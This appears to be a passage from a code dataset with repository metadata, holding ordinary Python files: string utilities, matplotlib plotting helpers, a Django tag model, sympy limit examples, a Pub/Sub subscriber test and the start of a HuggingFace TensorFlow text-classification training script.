if StringUtils.equals_ignore_case(text_line, string):
return line_ctr
line_ctr += 1
line_ctr = 1
for text_line in text_lines:
if StringUtils.check_pattern(text_line, string):
return line_ctr
line_ctr += 1
return False
@staticmethod
def check_pattern(text, pattern):
"""
Looks for supplied pattern in given text.
:param text: Text in which 'pattern' is to be searched.
:param pattern: Pattern expression to locate within given text.
:return: True if match was found, False otherwise.
:rtype: bool
"""
compiled_pattern = re.compile(pattern)
if len(compiled_pattern.findall(text)) > 0:
return True
return False
@staticmethod
def equals_ignore_case(string1, string2):
"""
Compares 2 given strings for equality regardless of case.
:param string1: String to be compared for equality.
:param string2: String to be compared for equality.
:return: True, if matching, False otherwise
:rtype: bool
"""
return string1.lower() == string2.lower()
@staticmethod
def equals_match_case(string1, string2):
"""
Compares 2 given strings for equality.
:param string1: String to be compared for equality.
:param string2: String to be compared for equality.
:return: True, if matching, False otherwise
:rtype: bool
"""
return string1 == string2
| 27.465278 | 110 | 0.594817 |
import re
import types
__author__ = "Jenson Jose"
__email__ = "jensonjose@live.in"
__status__ = "Alpha"
class StringUtils:
def __init__(self):
pass
@staticmethod
def is_blank(string):
if string.strip():
return False
return True
@staticmethod
def join_list_elements(string_list, join_char=""):
if isinstance(string_list, types.ListType):
if len(string_list) > 0:
return str(join_char).join(string_list)
return False
@staticmethod
def remove_lines(text, line_count):
text_lines = text.split("\n")
if len(text_lines) > 0:
if line_count > 0:
for index in range(0, line_count):
text_lines.remove(text_lines[index])
elif line_count < 0:
text_lines_r = text_lines
text_lines_r.reverse()
for index in range(0, line_count):
text_lines_r.remove(text_lines_r[index])
text_lines = text_lines_r
text_lines.reverse()
else:
pass
updated_text = StringUtils.join_list_elements(text_lines, "\n")
return updated_text
@staticmethod
def remove_lines_range(text, start_line_number, end_line_number):
text_lines = text.split("\n")
if len(text_lines) > 0:
for index in range(start_line_number, end_line_number):
text_lines.remove(text_lines[index])
updated_text = StringUtils.join_list_elements(text_lines, "\n")
return updated_text
@staticmethod
def remove_lines_list(text, line_list):
text_lines = text.split("\n")
if len(text_lines) > 0:
for line_index in line_list:
text_lines.remove(text_lines[line_index])
updated_text = StringUtils.join_list_elements(text_lines, "\n")
return updated_text
@staticmethod
def remove_leading_blanks(string):
text_lines = string.split("\n")
if len(text_lines) > 0:
for line in text_lines:
if StringUtils.is_blank(line):
text_lines.remove(line)
else:
break
updated_string = StringUtils.join_list_elements(text_lines, "\n")
return updated_string
@staticmethod
def remove_trailing_blanks(string):
text_lines = string.split("\n")
text_lines_r = ""
if len(text_lines) > 0:
text_lines_r = text_lines
text_lines_r.reverse()
for line in text_lines_r:
if StringUtils.is_blank(line):
text_lines_r.remove(line)
else:
break
text_lines = text_lines_r
text_lines.reverse()
updated_string = StringUtils.join_list_elements(text_lines, "\n")
return updated_string
@staticmethod
def extract_line(text, line_number):
text_lines = text.split("\n")
if len(text_lines) > 0:
return text_lines[line_number - 1]
return False
@staticmethod
def get_line_number(text, string):
text_lines = text.split("\n")
line_ctr = 1
for text_line in text_lines:
if StringUtils.equals_ignore_case(text_line, string):
return line_ctr
line_ctr += 1
line_ctr = 1
for text_line in text_lines:
if StringUtils.check_pattern(text_line, string):
return line_ctr
line_ctr += 1
return False
@staticmethod
def check_pattern(text, pattern):
compiled_pattern = re.compile(pattern)
if len(compiled_pattern.findall(text)) > 0:
return True
return False
@staticmethod
def equals_ignore_case(string1, string2):
return string1.lower() == string2.lower()
@staticmethod
def equals_match_case(string1, string2):
return string1 == string2
| true | true |
f725eecf105d6cb129a87a1af62fe37c37cb459b | 2,613 | py | Python | heppyplot/plot_helpers.py | ebothmann/heppyplot | dab969879391f70a91c34f71482a9691b9c80141 | [
"MIT"
] | null | null | null | heppyplot/plot_helpers.py | ebothmann/heppyplot | dab969879391f70a91c34f71482a9691b9c80141 | [
"MIT"
] | null | null | null | heppyplot/plot_helpers.py | ebothmann/heppyplot | dab969879391f70a91c34f71482a9691b9c80141 | [
"MIT"
] | null | null | null | import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
fig = plt.figure()
axes = []
if diff:
gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
main_axis = plt.subplot(gs[0])
axes.append(plt.subplot(gs[0]))
axes.append(plt.subplot(gs[1], sharex=main_axis))
else:
axes.append(plt.subplot())
return fig, axes
def layout_main_and_diff_axis(fig, axes):
main_axis, diff_axis = axes
fig.subplots_adjust(hspace=0.0)
main_axis.spines['bottom'].set_visible(False)
plt.setp(main_axis.get_xticklabels(), visible=False)
main_axis.set_xlabel('')
diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
legend = axis.legend(loc=loc,
title=title,
borderaxespad=borderpad,
framealpha=0.8,
frameon=draws_background,
fancybox=draws_background)
legend.get_frame().set_color((0.96,0.96,0.96))
for line in legend.get_lines():
line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
'right': 5, 'center left': 6,'center right': 7,
'lower center': 8, 'upper center': 9, 'center': 10}
at = AnchoredText(annotation,
codes[loc],
frameon=False,
borderpad=borderpad,
prop=dict(linespacing=2.5))
axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
interval = axis.get_view_interval()
ticks_in_view_interval = []
for tick, loc in zip(axis.get_major_ticks(),
axis.get_major_locator()()):
if mtransforms.interval_contains(interval, loc):
ticks_in_view_interval.append(tick)
return ticks_in_view_interval
def set_figure_size_with_width(width):
params = {'figure.figsize': figure_size_from_width(width)}
plt.rcParams.update(params)
def figure_size_from_width(width):
"""Returns a single plot figure size in inches given a width in points"""
inches_per_point = 1.0/72.27
golden_mean = (math.sqrt(5)-1.0)/2.0
inches_width = width * inches_per_point
fig_height = inches_width*golden_mean
return [inches_width,fig_height]
| 37.328571 | 95 | 0.643705 | import math
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.transforms as mtransforms
from mpl_toolkits.axes_grid.anchored_artists import AnchoredText
def setup_axes(diff=False):
fig = plt.figure()
axes = []
if diff:
gs = gridspec.GridSpec(2, 1, height_ratios=[2,1])
main_axis = plt.subplot(gs[0])
axes.append(plt.subplot(gs[0]))
axes.append(plt.subplot(gs[1], sharex=main_axis))
else:
axes.append(plt.subplot())
return fig, axes
def layout_main_and_diff_axis(fig, axes):
main_axis, diff_axis = axes
fig.subplots_adjust(hspace=0.0)
main_axis.spines['bottom'].set_visible(False)
plt.setp(main_axis.get_xticklabels(), visible=False)
main_axis.set_xlabel('')
diff_axis.xaxis.tick_bottom()
def configure_legend_on_axis(axis, title='', loc='best', borderpad=1.2, draws_background=True):
legend = axis.legend(loc=loc,
title=title,
borderaxespad=borderpad,
framealpha=0.8,
frameon=draws_background,
fancybox=draws_background)
legend.get_frame().set_color((0.96,0.96,0.96))
for line in legend.get_lines():
line.set_alpha(1.0)
def add_annotation_on_axis(axis, annotation, loc='upper right', borderpad=1.2):
codes = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4,
'right': 5, 'center left': 6,'center right': 7,
'lower center': 8, 'upper center': 9, 'center': 10}
at = AnchoredText(annotation,
codes[loc],
frameon=False,
borderpad=borderpad,
prop=dict(linespacing=2.5))
axis.add_artist(at)
def get_major_ticks_within_view_interval(axis):
interval = axis.get_view_interval()
ticks_in_view_interval = []
for tick, loc in zip(axis.get_major_ticks(),
axis.get_major_locator()()):
if mtransforms.interval_contains(interval, loc):
ticks_in_view_interval.append(tick)
return ticks_in_view_interval
def set_figure_size_with_width(width):
params = {'figure.figsize': figure_size_from_width(width)}
plt.rcParams.update(params)
def figure_size_from_width(width):
inches_per_point = 1.0/72.27
golden_mean = (math.sqrt(5)-1.0)/2.0
inches_width = width * inches_per_point
fig_height = inches_width*golden_mean
return [inches_width,fig_height]
| true | true |
f725efcbce1ccf39d91c665102551ed46f4594c4 | 187 | py | Python | Introduction_to_python/Module 2 Code Files/greater_than_exercise.py | leogithubid/data-analysis-using-python | 531e4fb3a05393c94979b5c571cda0f107cb5030 | [
"MIT"
] | null | null | null | Introduction_to_python/Module 2 Code Files/greater_than_exercise.py | leogithubid/data-analysis-using-python | 531e4fb3a05393c94979b5c571cda0f107cb5030 | [
"MIT"
] | null | null | null | Introduction_to_python/Module 2 Code Files/greater_than_exercise.py | leogithubid/data-analysis-using-python | 531e4fb3a05393c94979b5c571cda0f107cb5030 | [
"MIT"
] | null | null | null | def greater_than(x, y):
if x > y:
return True
else:
return False
a = 2
b = 3
result = greater_than(a, b)
print("{} is greater than {}: {}".format(a, b, result))
| 15.583333 | 55 | 0.545455 | def greater_than(x, y):
if x > y:
return True
else:
return False
a = 2
b = 3
result = greater_than(a, b)
print("{} is greater than {}: {}".format(a, b, result))
| true | true |
f725f033c68129465884ebe3416f353fef5cfe99 | 1,048 | py | Python | habitat/food/models/tag.py | matrach/habitatOS | 1ae2a3caf6f279cf6d6d20bcd81f24d50f61d7d3 | [
"MIT"
] | 1 | 2021-02-01T19:04:39.000Z | 2021-02-01T19:04:39.000Z | habitat/food/models/tag.py | matrach/habitatOS | 1ae2a3caf6f279cf6d6d20bcd81f24d50f61d7d3 | [
"MIT"
] | null | null | null | habitat/food/models/tag.py | matrach/habitatOS | 1ae2a3caf6f279cf6d6d20bcd81f24d50f61d7d3 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.db import models
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
class Tag(models.Model):
TYPE_CHOICES = [
('product', _('Product')),
('plan', _('Plan')),
('meal', _('Meal')),
]
name = models.CharField(verbose_name=_('Name'), max_length=255, db_index=True, default=None)
slug = models.SlugField(verbose_name=_('Slug'), editable=False, default=None)
type = models.CharField(verbose_name=_('Type'), max_length=30, choices=TYPE_CHOICES, default='product')
def __str__(self):
return f'{self.name}'
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super().save(*args, **kwargs)
class Meta:
ordering = ['name']
verbose_name = _('Tag')
verbose_name_plural = _('Tags')
class Admin(admin.ModelAdmin):
list_display = ['name', 'type']
ordering = ['name']
search_fields = ['^name']
list_editable = ['type']
| 29.942857 | 107 | 0.623092 | from django.contrib import admin
from django.db import models
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
class Tag(models.Model):
TYPE_CHOICES = [
('product', _('Product')),
('plan', _('Plan')),
('meal', _('Meal')),
]
name = models.CharField(verbose_name=_('Name'), max_length=255, db_index=True, default=None)
slug = models.SlugField(verbose_name=_('Slug'), editable=False, default=None)
type = models.CharField(verbose_name=_('Type'), max_length=30, choices=TYPE_CHOICES, default='product')
def __str__(self):
return f'{self.name}'
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super().save(*args, **kwargs)
class Meta:
ordering = ['name']
verbose_name = _('Tag')
verbose_name_plural = _('Tags')
class Admin(admin.ModelAdmin):
list_display = ['name', 'type']
ordering = ['name']
search_fields = ['^name']
list_editable = ['type']
| true | true |
f725f048c2db89cfc4013eb72273fee66ea06245 | 835 | py | Python | examples/beginner/limits_examples.py | msgoff/sympy | 1e7daef7514902f5e89718fa957b7b36c6669a10 | [
"BSD-3-Clause"
] | null | null | null | examples/beginner/limits_examples.py | msgoff/sympy | 1e7daef7514902f5e89718fa957b7b36c6669a10 | [
"BSD-3-Clause"
] | null | null | null | examples/beginner/limits_examples.py | msgoff/sympy | 1e7daef7514902f5e89718fa957b7b36c6669a10 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
"""Limits Example
Demonstrates limits.
"""
from sympy import exp, log, Symbol, Rational, sin, limit, sqrt, oo
def sqrt3(x):
return x ** Rational(1, 3)
def show(computed, correct):
print("computed:", computed, "correct:", correct)
def main():
x = Symbol("x")
show(limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo), -Rational(5) / 2)
show(limit(x * (sqrt(x ** 2 + 1) - x), x, oo), Rational(1) / 2)
show(limit(x - sqrt3(x ** 3 - 1), x, oo), Rational(0))
show(limit(log(1 + exp(x)) / x, x, -oo), Rational(0))
show(limit(log(1 + exp(x)) / x, x, oo), Rational(1))
show(limit(sin(3 * x) / x, x, 0), Rational(3))
show(limit(sin(5 * x) / sin(2 * x), x, 0), Rational(5) / 2)
show(limit(((x - 1) / (x + 1)) ** x, x, oo), exp(-2))
if __name__ == "__main__":
main()
| 20.365854 | 70 | 0.534132 |
from sympy import exp, log, Symbol, Rational, sin, limit, sqrt, oo
def sqrt3(x):
return x ** Rational(1, 3)
def show(computed, correct):
print("computed:", computed, "correct:", correct)
def main():
x = Symbol("x")
show(limit(sqrt(x ** 2 - 5 * x + 6) - x, x, oo), -Rational(5) / 2)
show(limit(x * (sqrt(x ** 2 + 1) - x), x, oo), Rational(1) / 2)
show(limit(x - sqrt3(x ** 3 - 1), x, oo), Rational(0))
show(limit(log(1 + exp(x)) / x, x, -oo), Rational(0))
show(limit(log(1 + exp(x)) / x, x, oo), Rational(1))
show(limit(sin(3 * x) / x, x, 0), Rational(3))
show(limit(sin(5 * x) / sin(2 * x), x, 0), Rational(5) / 2)
show(limit(((x - 1) / (x + 1)) ** x, x, oo), exp(-2))
if __name__ == "__main__":
main()
| true | true |
f725f160fe888789fd6fe5f15c095f239fd5e3ba | 4,182 | py | Python | tests/service_test.py | drmobile/pubsub-broker | e5bfface5be95b667a124ac3e47b6683ee25888c | [
"Apache-2.0"
] | 1 | 2020-11-13T16:04:04.000Z | 2020-11-13T16:04:04.000Z | tests/service_test.py | drmobile/pubsub-broker | e5bfface5be95b667a124ac3e47b6683ee25888c | [
"Apache-2.0"
] | 3 | 2018-07-20T09:38:56.000Z | 2018-12-25T06:18:29.000Z | tests/service_test.py | drmobile/pubsub-broker | e5bfface5be95b667a124ac3e47b6683ee25888c | [
"Apache-2.0"
] | 3 | 2018-04-10T10:37:27.000Z | 2018-12-25T06:05:19.000Z | # coding=utf-8
#
import time
import copy
import pytest
import logging
import unittest
import threading
import concurrent.futures
from multiprocessing import Manager
from soocii_pubsub_lib import pubsub_client, sub_service
# ========== Initial Logger ==========
logging.basicConfig(
level=logging.DEBUG,
format='[%(asctime)-15s][%(thread)d][%(levelname)-5s][%(filename)s][%(funcName)s#%(lineno)d] %(message)s')
logger = logging.getLogger(__name__)
# ====================================
# normal subscribe
@pytest.mark.usefixtures("start_emulator")
class NormalSubscribeTests(unittest.TestCase):
def setUp(self):
self.project = 'fake-project'
self.cred = None
self.topic = 'fake-topic'
self.published_message_id = None
# self.received_message = None
# self.received_message_counts = 0
self.service = None
# shared variables due to multi-threading
manager = Manager()
self.lock = threading.Lock()
self.received_message = manager.dict()
self.received_message_counts = manager.Value('i', 0)
def tearDown(self):
pass
def __on_published(self, message_id):
logger.info('message is published with message id: {}'.format(message_id))
self.published_message_id = message_id
def __on_received(self, message):
try:
with self.lock:
logger.info('message is received with payload: {}'.format(message))
self.received_message = copy.deepcopy(message)
self.received_message_counts.value = self.received_message_counts.value + 1
logger.info('received_message: {}, received_message_counts: {}'.format(self.received_message, self.received_message_counts.value))
except Exception as e:
logger.exception('unexpected exception was caughted: {}'.format(e))
# ack message
logger.info('ack message')
return True
def __publisher(self):
# prepare publisher
publisher = pubsub_client.PublisherClient(self.project, self.cred)
# get configuration of the topic before sending request
exception_caughted = False
try:
publisher.get_topic(self.topic)
except Exception as e:
exception_caughted = True
logger.exception('unexpected exception was caughted: {}'.format(e))
self.assertFalse(exception_caughted)
# publish bytes
logger.info('start publishing message')
for _ in range(5):
publisher.publish(self.topic, b'bytes data', callback=lambda message_id: self.__on_published(message_id))
time.sleep(0.5)
def __subscriber(self):
# prepare subscriber
self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
self.subscription.create_subscription(self.topic, 'fake-subscription')
self.service = sub_service.SubscriptionService(self.subscription)
logger.info('start subscribing message')
self.service.run(callback=lambda message: self.__on_received(message))
def __waitter(self):
# wait for callback
time.sleep(10)
self.service.shutdown()
# @pytest.mark.skip(reason="not reliable in travis CI")
def test_subscribe_message(self):
# prepare publisher
publisher = pubsub_client.PublisherClient(self.project, self.cred)
publisher.create_topic(self.topic)
# prepare subscriber
self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
self.subscription.create_subscription(self.topic, 'fake-subscription')
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(lambda: self.__waitter())
self.__publisher()
# subscriber service MUST run in main thread
self.__subscriber()
# verify if message has been received
assert self.received_message is not None
assert self.received_message['data'] == b'bytes data'
assert self.received_message['attributes'] == {}
assert self.received_message_counts.value == 5
| 38.018182 | 146 | 0.662602 |
import time
import copy
import pytest
import logging
import unittest
import threading
import concurrent.futures
from multiprocessing import Manager
from soocii_pubsub_lib import pubsub_client, sub_service
logging.basicConfig(
level=logging.DEBUG,
format='[%(asctime)-15s][%(thread)d][%(levelname)-5s][%(filename)s][%(funcName)s#%(lineno)d] %(message)s')
logger = logging.getLogger(__name__)
@pytest.mark.usefixtures("start_emulator")
class NormalSubscribeTests(unittest.TestCase):
def setUp(self):
self.project = 'fake-project'
self.cred = None
self.topic = 'fake-topic'
self.published_message_id = None
self.service = None
manager = Manager()
self.lock = threading.Lock()
self.received_message = manager.dict()
self.received_message_counts = manager.Value('i', 0)
def tearDown(self):
pass
def __on_published(self, message_id):
logger.info('message is published with message id: {}'.format(message_id))
self.published_message_id = message_id
def __on_received(self, message):
try:
with self.lock:
logger.info('message is received with payload: {}'.format(message))
self.received_message = copy.deepcopy(message)
self.received_message_counts.value = self.received_message_counts.value + 1
logger.info('received_message: {}, received_message_counts: {}'.format(self.received_message, self.received_message_counts.value))
except Exception as e:
logger.exception('unexpected exception was caughted: {}'.format(e))
logger.info('ack message')
return True
def __publisher(self):
publisher = pubsub_client.PublisherClient(self.project, self.cred)
exception_caughted = False
try:
publisher.get_topic(self.topic)
except Exception as e:
exception_caughted = True
logger.exception('unexpected exception was caughted: {}'.format(e))
self.assertFalse(exception_caughted)
logger.info('start publishing message')
for _ in range(5):
publisher.publish(self.topic, b'bytes data', callback=lambda message_id: self.__on_published(message_id))
time.sleep(0.5)
def __subscriber(self):
self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
self.subscription.create_subscription(self.topic, 'fake-subscription')
self.service = sub_service.SubscriptionService(self.subscription)
logger.info('start subscribing message')
self.service.run(callback=lambda message: self.__on_received(message))
def __waitter(self):
time.sleep(10)
self.service.shutdown()
def test_subscribe_message(self):
publisher = pubsub_client.PublisherClient(self.project, self.cred)
publisher.create_topic(self.topic)
self.subscription = pubsub_client.SubscribeClient(self.project, self.cred)
self.subscription.create_subscription(self.topic, 'fake-subscription')
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(lambda: self.__waitter())
self.__publisher()
self.__subscriber()
assert self.received_message is not None
assert self.received_message['data'] == b'bytes data'
assert self.received_message['attributes'] == {}
assert self.received_message_counts.value == 5
| true | true |
f725f1c930f026fc5ad6709114adb3ed8d9d5763 | 23,200 | py | Python | examples/tensorflow/text-classification/run_text_classification.py | SeanNaren/transformers | 8d43c71a1ca3ad322cc45008eb66a5611f1e017e | [
"Apache-2.0"
] | 1 | 2021-04-10T07:59:12.000Z | 2021-04-10T07:59:12.000Z | examples/tensorflow/text-classification/run_text_classification.py | SeanNaren/transformers | 8d43c71a1ca3ad322cc45008eb66a5611f1e017e | [
"Apache-2.0"
] | null | null | null | examples/tensorflow/text-classification/run_text_classification.py | SeanNaren/transformers | 8d43c71a1ca3ad322cc45008eb66a5611f1e017e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
# Copyright 2021 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Fine-tuning the library models for sequence classification."""
# You can also adapt this script on your own text classification task. Pointers for this are left as comments.
import logging
import os
import random
import sys
from dataclasses import dataclass, field
from math import ceil
from pathlib import Path
from typing import Optional
import numpy as np
from datasets import load_dataset
from transformers import (
AutoConfig,
AutoTokenizer,
HfArgumentParser,
PretrainedConfig,
TFAutoModelForSequenceClassification,
TrainingArguments,
set_seed,
)
from transformers.file_utils import CONFIG_NAME, TF2_WEIGHTS_NAME
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1" # Reduce the amount of console output from TF
import tensorflow as tf # noqa: E402
logger = logging.getLogger(__name__)
# region Helper classes
class DataSequence(tf.keras.utils.Sequence):
# We use a Sequence object to load the data. Although it's completely possible to load your data as Numpy/TF arrays
# and pass those straight to the Model, this constrains you in a couple of ways. Most notably, it requires all
# the data to be padded to the length of the longest input example, and it also requires the whole dataset to be
# loaded into memory. If these aren't major problems for you, you can skip the sequence object in your own code!
def __init__(self, dataset, non_label_column_names, batch_size, labels, shuffle=True):
super().__init__()
# Retain all of the columns not present in the original data - these are the ones added by the tokenizer
self.data = {
key: dataset[key]
for key in dataset.features.keys()
if key not in non_label_column_names and key != "label"
}
data_lengths = {len(array) for array in self.data.values()}
assert len(data_lengths) == 1, "Dataset arrays differ in length!"
self.data_length = data_lengths.pop()
self.num_batches = ceil(self.data_length / batch_size)
if labels:
self.labels = np.array(dataset["label"])
assert len(self.labels) == self.data_length, "Labels not the same length as input arrays!"
else:
self.labels = None
self.batch_size = batch_size
self.shuffle = shuffle
if self.shuffle:
# Shuffle the data order
self.permutation = np.random.permutation(self.data_length)
else:
self.permutation = None
def on_epoch_end(self):
# If we're shuffling, reshuffle the data order after each epoch
if self.shuffle:
self.permutation = np.random.permutation(self.data_length)
def __getitem__(self, item):
# Note that this yields a batch, not a single sample
batch_start = item * self.batch_size
batch_end = (item + 1) * self.batch_size
if self.shuffle:
data_indices = self.permutation[batch_start:batch_end]
else:
data_indices = np.arange(batch_start, batch_end)
# We want to pad the data as little as possible, so we only pad each batch
# to the maximum length within that batch. We do that by stacking the variable-
# length inputs into a ragged tensor and then densifying it.
batch_input = {
key: tf.ragged.constant([data[i] for i in data_indices]).to_tensor() for key, data in self.data.items()
}
if self.labels is None:
return batch_input
else:
batch_labels = self.labels[data_indices]
return batch_input, batch_labels
def __len__(self):
return self.num_batches
class SavePretrainedCallback(tf.keras.callbacks.Callback):
# Hugging Face models have a save_pretrained() method that saves both the weights and the necessary
# metadata to allow them to be loaded as a pretrained model in future. This is a simple Keras callback
# that saves the model with this method after each epoch.
def __init__(self, output_dir, **kwargs):
super().__init__()
self.output_dir = output_dir
def on_epoch_end(self, epoch, logs=None):
self.model.save_pretrained(self.output_dir)
# endregion
# region Command-line arguments
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
Using `HfArgumentParser` we can turn this class
into argparse arguments to be able to specify them on
the command line.
"""
train_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the training data."}
)
validation_file: Optional[str] = field(
default=None, metadata={"help": "A csv or a json file containing the validation data."}
)
test_file: Optional[str] = field(default=None, metadata={"help": "A csv or a json file containing the test data."})
max_seq_length: int = field(
default=128,
metadata={
"help": "The maximum total input sequence length after tokenization. Sequences longer "
"than this will be truncated, sequences shorter will be padded."
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached preprocessed datasets or not."}
)
pad_to_max_length: bool = field(
default=False,
metadata={
"help": "Whether to pad all samples to `max_seq_length`. "
"If False, will pad the samples dynamically when batching to the maximum length in the batch."
},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_predict_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of predict examples to this "
"value if set."
},
)
def __post_init__(self):
train_extension = self.train_file.split(".")[-1].lower() if self.train_file is not None else None
validation_extension = (
self.validation_file.split(".")[-1].lower() if self.validation_file is not None else None
)
test_extension = self.test_file.split(".")[-1].lower() if self.test_file is not None else None
extensions = {train_extension, validation_extension, test_extension}
extensions.discard(None)
assert len(extensions) != 0, "Need to supply at least one of --train_file, --validation_file or --test_file!"
assert len(extensions) == 1, "All input files should have the same file extension, either csv or json!"
assert "csv" in extensions or "json" in extensions, "Input files should have either .csv or .json extensions!"
self.input_file_extension = extensions.pop()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": "Will use the token generated when running `transformers-cli login` (necessary to use this script "
"with private models)."
},
)
# endregion
def main():
# region Argument parsing
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
output_dir = Path(training_args.output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
# endregion
# region Checkpoints
# Detecting last checkpoint.
checkpoint = None
if len(os.listdir(training_args.output_dir)) > 0 and not training_args.overwrite_output_dir:
if (output_dir / CONFIG_NAME).is_file() and (output_dir / TF2_WEIGHTS_NAME).is_file():
checkpoint = output_dir
logger.info(
f"Checkpoint detected, resuming training from checkpoint in {training_args.output_dir}. To avoid this"
" behavior, change the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
else:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to continue regardless."
)
# endregion
# region Logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
handlers=[logging.StreamHandler(sys.stdout)],
)
logger.setLevel(logging.INFO)
logger.info(f"Training/evaluation parameters {training_args}")
# endregion
# region Loading data
# For CSV/JSON files, this script will use the 'label' field as the label and the 'sentence1' and optionally
# 'sentence2' fields as inputs if they exist. If not, the first two fields not named label are used if at least two
# columns are provided. Note that the term 'sentence' can be slightly misleading, as they often contain more than
# a single grammatical sentence, when the task requires it.
#
# If the CSVs/JSONs contain only one non-label column, the script does single sentence classification on this
# single column. You can easily tweak this behavior (see below)
#
# In distributed training, the load_dataset function guarantee that only one local process can concurrently
# download the dataset.
data_files = {"train": data_args.train_file, "validation": data_args.validation_file, "test": data_args.test_file}
data_files = {key: file for key, file in data_files.items() if file is not None}
for key in data_files.keys():
logger.info(f"Loading a local file for {key}: {data_files[key]}")
if data_args.input_file_extension == "csv":
# Loading a dataset from local csv files
datasets = load_dataset("csv", data_files=data_files, cache_dir=model_args.cache_dir)
else:
# Loading a dataset from local json files
datasets = load_dataset("json", data_files=data_files, cache_dir=model_args.cache_dir)
# See more about loading any type of standard or custom dataset at
# https://huggingface.co/docs/datasets/loading_datasets.html.
# endregion
# region Label preprocessing
# If you've passed us a training set, we try to infer your labels from it
if "train" in datasets:
# By default we assume that if your label column looks like a float then you're doing regression,
# and if not then you're doing classification. This is something you may want to change!
is_regression = datasets["train"].features["label"].dtype in ["float32", "float64"]
if is_regression:
num_labels = 1
else:
# A useful fast method:
# https://huggingface.co/docs/datasets/package_reference/main_classes.html#datasets.Dataset.unique
label_list = datasets["train"].unique("label")
label_list.sort() # Let's sort it for determinism
num_labels = len(label_list)
# If you haven't passed a training set, we read label info from the saved model (this happens later)
else:
num_labels = None
label_list = None
is_regression = None
# endregion
# region Load pretrained model and tokenizer
# Set seed before initializing model
set_seed(training_args.seed)
#
# In distributed training, the .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
if checkpoint is not None:
config_path = training_args.output_dir
elif model_args.config_name:
config_path = model_args.config_name
else:
config_path = model_args.model_name_or_path
if num_labels is not None:
config = AutoConfig.from_pretrained(
config_path,
num_labels=num_labels,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
else:
config = AutoConfig.from_pretrained(
config_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
if checkpoint is None:
model_path = model_args.model_name_or_path
else:
model_path = checkpoint
model = TFAutoModelForSequenceClassification.from_pretrained(
model_path,
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
)
# endregion
# region Optimizer, loss and compilation
